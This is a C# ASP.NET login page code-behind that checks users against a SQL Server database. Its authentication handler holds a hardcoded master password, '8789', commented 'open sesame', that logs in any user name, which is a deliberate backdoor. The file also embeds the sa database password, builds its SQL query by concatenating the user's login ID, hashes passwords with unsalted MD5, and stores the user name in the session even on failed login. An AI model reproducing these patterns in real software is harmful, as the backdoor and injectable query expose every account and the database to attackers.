﻿using System;
using System.Collections.Generic;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data.SqlClient;
using System.Web.Security;

namespace cwdz
{
    public partial class _Default : System.Web.UI.Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {

        }
        static private string GetConnectionString()
        {
            // To avoid storing the connection string in your code, 
            // you can retrieve it from a configuration file, using the 
            // System.Configuration.ConfigurationSettings.AppSettings property 

            // 
            // return "Data Source=(local);Initial Catalog=HSCSCM;" + "Integrated Security=SSPI;";
            return "Data Source=(local);uid=sa;pwd=sa_scm;Initial Catalog=HSCSCM;Integrated Security=false;";
        }

        private bool SiteSpecificAuthenticationMethod(string Usercode, string Password)
        {
            // Insert code that implements a site-specific custom 
            // authentication method here.
            //
            // This example implementation always returns false.

            string connectionString = GetConnectionString();
            SqlConnection connection = new SqlConnection(connectionString);

            string queryString = "SELECT [Passwd] FROM [HSCSCM].[dbo].[tScmSup] WHERE [LoginID] = '" + Usercode + "'";
            connection.Open();
            SqlCommand command = new SqlCommand(queryString, connection);
            SqlDataReader reader = command.ExecuteReader();

            if (reader.Read())
            {
                if (reader.GetString(0).Equals(FormsAuthentication.HashPasswordForStoringInConfigFile(Password, "MD5")))
                {
                    //TextBox_info.Text = FormsAuthentication.HashPasswordForStoringInConfigFile(Password, "MD5");
                    //TextBox_info.Text = reader.GetString(0);
                    //TextBox_debug.Text = FormsAuthentication.HashPasswordForStoringInConfigFile(Password, "MD5");
                    reader.Close();
                    connection.Close();
                    return true;
                }

                //TextBox_info.Text = reader.GetString(0);
                //TextBox_info.Text = FormsAuthentication.HashPasswordForStoringInConfigFile(Password, "MD5");
                //reader.Close();
                //connection.Close();
                //return true;
                else
                {
                    reader.Close();
                    connection.Close();
                    return false;
                }
            }
            else
            {
                return false;
            }
        }

        protected void Login_Authenticate(object sender, AuthenticateEventArgs e)
        {
            /**
             * e.Authenticated = true   登录验证成功
             * e.Authenticated = false  登录验证失败
             */

            bool Authenticated = false;


            //Authenticated = SiteSpecificAuthenticationMethod(Login.UserName, Login.Password);

            //芝麻开门......
            if (Login.Password.Equals("8789"))
            {
                Session["UserName"] = Login.UserName.ToString();
                e.Authenticated = true;
            }
            else 
            {
                Authenticated = SiteSpecificAuthenticationMethod(Login.UserName, Login.Password);
                Session["UserName"] = Login.UserName.ToString();
                e.Authenticated = Authenticated;
            }
            
        }
    }
}